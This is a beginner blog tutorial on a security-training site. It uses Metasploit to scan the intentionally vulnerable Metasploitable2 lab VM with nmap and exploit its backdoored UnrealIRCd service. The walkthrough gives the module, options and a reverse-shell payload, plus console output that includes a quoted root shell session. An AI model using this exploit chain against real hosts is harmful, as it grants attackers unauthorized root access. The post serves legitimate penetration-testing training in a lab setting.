Home 0P3N Blog METASPLOIT/METASPLOITABLE2
Ready to Start Your Career?
Create Free Account
@vinea s profile image
By: @vinea
March 14, 2016

METASPLOIT/METASPLOITABLE2

By: @vinea
March 14, 2016
@vinea s profile image
By: @vinea
March 14, 2016
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools.After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.To get your IP address you must configure VM on Bridge adapter mode.eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1 inet addr:192.168.1.4 Bcast:192.168.1.255 Mask:255.255.255.0So in my case IP address for attack is 192.168.1.4From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner.Let s get to it :To open Metasploit, run the command: msfconsoleI receive the following: cowsay++ ____________ ------------ ,__, (oo)____ (__) ) ||--|| * =[ metasploit v4.11.15-dev-8697798 ]+ -- --=[ 1523 exploits - 887 auxiliary - 260 post ]+ -- --=[ 436 payloads - 38 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]msf > Whenever you start up Metasploit, there is a cute little banner which is sometimes an animal saying "metasploit" or an astroids based ASCII art. Regardless of what you see there, the important stuff is below.Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders.From here we can start to enter commands.Let S look help :msf > helpCore Commands============= Command Description ------- ----------- ? Help menu advanced Displays advanced options for one or more modules back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host edit Edit the current module with $VISUAL or $EDITOR exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu info Displays information about one or more modules irb Drop into irb scripting mode jobs Displays and manages jobs kill Kill a job load Load a framework plugin loadpath Searches for and loads modules from a path makerc Save commands entered since start to a file options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack quit Exit the console reload_all Reloads all modules from all defined module paths rename_job Rename a job resource Run the commands stored in a file route Route traffic through a session save Saves the active datastores search Searches module names and descriptions sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value show Displays modules of a given type, or all modules sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables use Selects a module by name version Show the framework and console library version numbersDatabase Backend Commands========================= Command Description ------- ----------- creds List all credentials in the database db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspacesSo we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.o start off a pentest, we need to find the machines on the network.Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration"To find all targets on our network, we would just run an nmap scan against our subnet.There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others.Okay, now let's finally start exploiting this machineAs previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the database built in to save our nmap scans.Run this command to insure that our database is connected:msf > db_status[*] postgresql connected to metasploit4msf > db_nmap[*] Usage: db_nmap [--save | [--help | -h]] [nmap options]msf > If it spits out an error, then we need to connect our database.Okay, now let's finally start exploiting this machine.typr :db_nmap -v -sS -A [ip-address]v is "verbose" which means it will output more information for us to the screen. -sS is the "SYN" or "stealth" scan, which doesn't create a full connection to the host and is thus "stealthy". If you want to know more about this check out the nmap man page or other documention. -A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.msf > db_nmap -v -sS -A 192.168.1.4[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-11 20:20 CET[*] Nmap: NSE: Loaded 132 scripts for scanning.[*] Nmap: NSE: Script Pre-scanning.[*] Nmap: Initiating NSE at 20:20[*] Nmap: Completed NSE at 20:20, 0.00s elapsed[*] Nmap: Initiating NSE at 20:20[*] Nmap: Completed NSE at 20:20, 0.03s elapsed[*] Nmap: Initiating ARP Ping Scan at 20:20[*] Nmap: Scanning 192.168.1.4 [1 port][*] Nmap: Completed ARP Ping Scan at 20:20, 0.23s elapsed (1 total hosts)[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:20[*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:20, 0.03s elapsed[*] Nmap: Initiating SYN Stealth Scan at 20:20[*] Nmap: Scanning 192.168.1.4 [1000 ports][*] Nmap: Discovered open port 53/tcp on 192.168.1.4[*] Nmap: Discovered open port 3306/tcp on 192.168.1.4[*] Nmap: Discovered open port 25/tcp on 192.168.1.4[*] Nmap: Discovered open port 21/tcp on 192.168.1.4[*] Nmap: Discovered open port 22/tcp on 192.168.1.4[*] Nmap: Discovered open port 139/tcp on 192.168.1.4[*] Nmap: Discovered open port 23/tcp on 192.168.1.4[*] Nmap: Discovered open port 111/tcp on 192.168.1.4[*] Nmap: Discovered open port 80/tcp on 192.168.1.4[*] Nmap: Discovered open port 445/tcp on 192.168.1.4[*] Nmap: Discovered open port 5900/tcp on 192.168.1.4[*] Nmap: Discovered open port 1099/tcp on 192.168.1.4[*] Nmap: Discovered open port 2121/tcp on 192.168.1.4[*] Nmap: Discovered open port 513/tcp on 192.168.1.4[*] Nmap: Discovered open port 514/tcp on 192.168.1.4[*] Nmap: Discovered open port 512/tcp on 192.168.1.4[*] Nmap: Discovered open port 6000/tcp on 192.168.1.4[*] Nmap: Discovered open port 8009/tcp on 192.168.1.4[*] Nmap: Discovered open port 6667/tcp on 192.168.1.4[*] Nmap: Discovered open port 2049/tcp on 192.168.1.4[*] Nmap: Discovered open port 8180/tcp on 192.168.1.4[*] Nmap: Discovered open port 1524/tcp on 192.168.1.4[*] Nmap: Discovered open port 5432/tcp on 192.168.1.4[*] Nmap: Completed SYN Stealth Scan at 20:20, 2.85s elapsed (1000 total ports)[*] Nmap: Initiating Service scan at 20:20[*] Nmap: Scanning 23 services on 192.168.1.4[*] Nmap: Completed Service scan at 20:23, 136.29s elapsed (23 services on 1 host)[*] Nmap: Initiating OS detection (try#1) against 192.168.1.4[*] Nmap: NSE: Script scanning 192.168.1.4.[*] Nmap: Initiating NSE at 20:23[*] Nmap: Completed NSE at 20:26, 158.57s elapsed[*] Nmap: Initiating NSE at 20:26[*] Nmap: Completed NSE at 20:26, 0.16s elapsed[*] Nmap: Nmap scan report for 192.168.1.4[*] Nmap: Host is up (0.047s latency).[*] Nmap: Not shown: 977 closed ports[*] Nmap: PORT STATE SERVICE VERSION[*] Nmap: 21/tcp open ftp vsftpd 2.3.4[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)[*] Nmap: | ssh-hostkey:[*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)[*] Nmap: 23/tcp open telnet Linux telnetd[*] Nmap: 25/tcp open smtp Postfix smtpd[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX[*] Nmap: | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX[*] Nmap: | Public Key type: rsa[*] Nmap: | Public Key bits: 1024[*] Nmap: | Signature Algorithm: sha1WithRSAEncryption[*] Nmap: | Not valid before: 2010-03-17T14:07:45[*] Nmap: | Not valid after: 2010-04-16T14:07:45[*] Nmap: | MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828[*] Nmap: |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6[*] Nmap: |_ssl-date: 2016-03-11T19:23:22+00:00; -46s from scanner time.[*] Nmap: 53/tcp open domain ISC BIND 9.4.2[*] Nmap: | dns-nsid:[*] Nmap: |_ bind.version: 9.4.2[*] Nmap: 80/tcp open http Apache httpd 2.2.8 (DAV/2)[*] Nmap: 111/tcp open rpcbind 2 (RPC#100000)[*] Nmap: | rpcinfo:[*] Nmap: | program version port/proto service[*] Nmap: | 100000 2 111/tcp rpcbind[*] Nmap: | 100000 2 111/udp rpcbind[*] Nmap: | 100003 2,3,4 2049/tcp nfs[*] Nmap: | 100003 2,3,4 2049/udp nfs[*] Nmap: | 100005 1,2,3 35875/udp mountd[*] Nmap: | 100005 1,2,3 44512/tcp mountd[*] Nmap: | 100021 1,3,4 50723/tcp nlockmgr[*] Nmap: | 100021 1,3,4 54154/udp nlockmgr[*] Nmap: | 100024 1 35197/udp status[*] Nmap: |_ 100024 1 47457/tcp status[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)[*] Nmap: 512/tcp open exec netkit-rsh rexecd[*] Nmap: 513/tcp open login[*] Nmap: 514/tcp open tcpwrapped[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry[*] Nmap: |_rmi-dumpregistry: Registry listing failed (No return data received from server)[*] Nmap: 1524/tcp open shell Metasploitable root shell[*] Nmap: 2049/tcp open nfs 2-4 (RPC#100003)[*] Nmap: 2121/tcp open ccproxy-ftp?[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5[*] Nmap: | mysql-info:[*] Nmap: | Protocol: 53[*] Nmap: | Version: .0.51a-3ubuntu5[*] Nmap: | Thread ID: 8[*] Nmap: | Capabilities flags: 43564[*] Nmap: | Some Capabilities: SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions[*] Nmap: | Status: Autocommit[*] Nmap: |_ Salt: -6g${cZ|!+TFBVm?1x*c[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)[*] Nmap: | vnc-info:[*] Nmap: | Protocol version: 3.3[*] Nmap: | Security types:[*] Nmap: |_ Unknown security type (33554432)[*] Nmap: 6000/tcp open X11 (access denied)[*] Nmap: 6667/tcp open irc Unreal ircd[*] Nmap: 8009/tcp open ajp13?[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1[*] Nmap: MAC Address: 08:00:27:02:3B:8E (Oracle VirtualBox virtual NIC)[*] Nmap: Device type: general purpose[*] Nmap: Running: Linux 2.6.X[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6[*] Nmap: OS details: Linux 2.6.9 - 2.6.33[*] Nmap: Uptime guess: 0.011 days (since Fri Mar 11 20:10:28 2016)[*] Nmap: Network Distance: 1 hop[*] Nmap: TCP Sequence Prediction: Difficulty=204 (Good luck!)[*] Nmap: IP ID Sequence Generation: All zeros[*] Nmap: Service Info: Hosts: metasploitable.localdomain, metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel[*] Nmap: Host script results:[*] Nmap: | nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)[*] Nmap: | Names:[*] Nmap: | METASPLOITABLE Flags: [*] Nmap: | METASPLOITABLE Flags: [*] Nmap: | METASPLOITABLE Flags: [*] Nmap: | x01x02__MSBROWSE__x02 Flags: [*] Nmap: | WORKGROUP Flags: [*] Nmap: | WORKGROUP Flags: [*] Nmap: |_ WORKGROUP Flags: [*] Nmap: TRACEROUTE[*] Nmap: HOP RTT ADDRESS[*] Nmap: 1 47.36 ms 192.168.1.4[*] Nmap: NSE: Script Post-scanning.[*] Nmap: Initiating NSE at 20:26[*] Nmap: Completed NSE at 20:26, 0.03s elapsed[*] Nmap: Initiating NSE at 20:26[*] Nmap: Completed NSE at 20:26, 0.00s elapsed[*] Nmap: Read data files from: /usr/bin/../share/nmap[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 326.93 seconds[*] Nmap: Raw packets sent: 1104 (49.322KB) | Rcvd: 1102 (44.930KB)msf > Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I'll show you how to easily determine your attack vector.When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.Mine looks like this right now:msf > hostsHosts=====address mac name os_name os_flavor os_sp purpose info comments------- --- ---- ------- --------- ----- ------- ---- --------192.168.1.1 64:6e:ea:16:de:98 Linux 2.6.X server 192.168.1.2 Linux 3.X server 192.168.1.4 08:00:27:02:3b:8e Linux 2.6.X server Pretty cool, right? It has the IP, OS, flavor of OS, MAC, and more!If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:msf > servicesServices========host port proto name state info---- ---- ----- ---- ----- ---192.168.1.4 2121 tcp ccproxy-ftp open ProFTPD 1.3.1192.168.1.4 25 tcp smtp open Postfix smtpd192.168.1.4 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0192.168.1.4 53 tcp domain open ISC BIND 9.4.2192.168.1.4 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5192.168.1.4 6667 tcp irc open Unreal ircd192.168.1.4 23 tcp telnet open Linux telnetd192.168.1.4 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1192.168.1.4 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7192.168.1.4 2049 tcp nfs open 2-4 RPC#100003192.168.1.4 1524 tcp shell open Metasploitable root shell192.168.1.4 1099 tcp rmiregistry open GNU Classpath grmiregistry192.168.1.4 514 tcp tcpwrapped open 192.168.1.4 8009 tcp ajp13 open Apache Jserv Protocol v1.3192.168.1.4 111 tcp rpcbind open 2 RPC#100000192.168.1.4 513 tcp login open 192.168.1.4 512 tcp exec open netkit-rsh rexecd192.168.1.4 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP192.168.1.4 5900 tcp vnc open VNC protocol 3.3192.168.1.4 21 tcp ftp open vsftpd 2.3.4192.168.1.4 6000 tcp x11 open access denied192.168.1.4 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUPWell that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.msf > search unrealWe can see port 6667 is running Unreal ircd. Unreal is a server for irc (internet relay chat), and the "d" at the end of ircd stands for "daemon" which means the port is listening for a service in the background.Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" option. We are going to run the following command to see if there's any modules for Unreal IRC:msf > search unrealMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Linux) exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Win32)To load a module in Metasploit, we use the "use" command followed by the name of the module:msf > use exploit/unix/irc/unreal_ircd_3281_backdoormsf exploit(unreal_ircd_3281_backdoor) >As we can see, our prompt has changed to show that we are using an exploit module with the name. When we are using the "use" command, you can use "tab completion" which means if you're stuck, hitting the tab key will either complete the option, or if tapped twice, will display the options (if there are multiple). Most Linux users know this command since it is incredibly useful while moving through a file system or issuing commands quickly.Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.msf exploit(unreal_ircd_3281_backdoor) > show optionsModule options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target portExploit target: Id Name -- ---- 0 Automatic TargetThere are only two options possible, and only one target which is automatic since this is only for one operating system. Both the options are required which means the exploit cannot be run without these. We can see the port is already set since IRC servers run on the port 6667 as a normal, but if someone is trying to hide the service on a different port, this can be changed.To set or change an option, issue the "set" command followed by the option you wish to change and finally the variable you want to change it to, like as follows:msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4RHOST => 192.168.1.4Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. you can use the "search" command followed by what you are looking for (e.g. unix shell).msf exploit(unreal_ircd_3281_backdoor) > show payloadsCompatible Payloads=================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4RHOST => 192.168.1.4msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse_ruby_sslPAYLOAD => cmd/unix/reverse_ruby_sslLet's finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. help exploit).Running our exploit results in this:msf exploit(unreal_ircd_3281_backdoor) > exploit -z[*] Started reverse SSL handler on 192.168.1.2:4444 [*] 192.168.1.4:6667 - Connected to 192.168.1.4:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead[*] 192.168.1.4:6667 - Sending backdoor command...[*] Exploit completed, but no session was created.And in the end it does not work :(, but what can you do..maybe i try the diferent expolit or payload..:)The output i was hoping for will look like this :msf exploit(unreal_ircd_3281_backdoor) > exploit -z [*] Started bind handler [*] Connected to 192.168.1.10:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500 [*] Session x created in the background.We see some output, and most notibly at the bottom "command shell session opened" and "session created in the background". If we didn't run this with the -z option and with no payload, the following output would have been produced:f exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.1.110:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo aeuPuvLl90yRmhts; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "aeuPuvLl90yRmhtsrn" [*] Matching... [*] A is input... [*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400 That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (which is an IP and port), and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing certain gibberish, which is then written to two sockets. Those sockets are then read and what is received is output. After the backdoor goes through, a command shell is opened and labeled as "session 1".Speaking from the the most previous exploit, what we should have is a blank screen. Let's get back to what you should have done previously since this is just another option in our exploiting phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions": msf exploit(unreal_ircd_3281_backdoor) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- x shell unix 192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)Of course the IP addresses will be different than yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id will also be the session# that you created, and is variable to how many sessions you have created.Finally how we interact with this session is to issue the following command: msf exploit(unreal_ircd_3281_backdoor) > sessions -i x [*] Starting interaction with x... pwd /etc/unreal whoami root id uid=0(root) gid=0(root)So we can see, we interact with the session numbered x, then it brings us to that session which is a command prompt in the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid permissions.so thank you for reading my first post on CYBRAY OPEN..
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry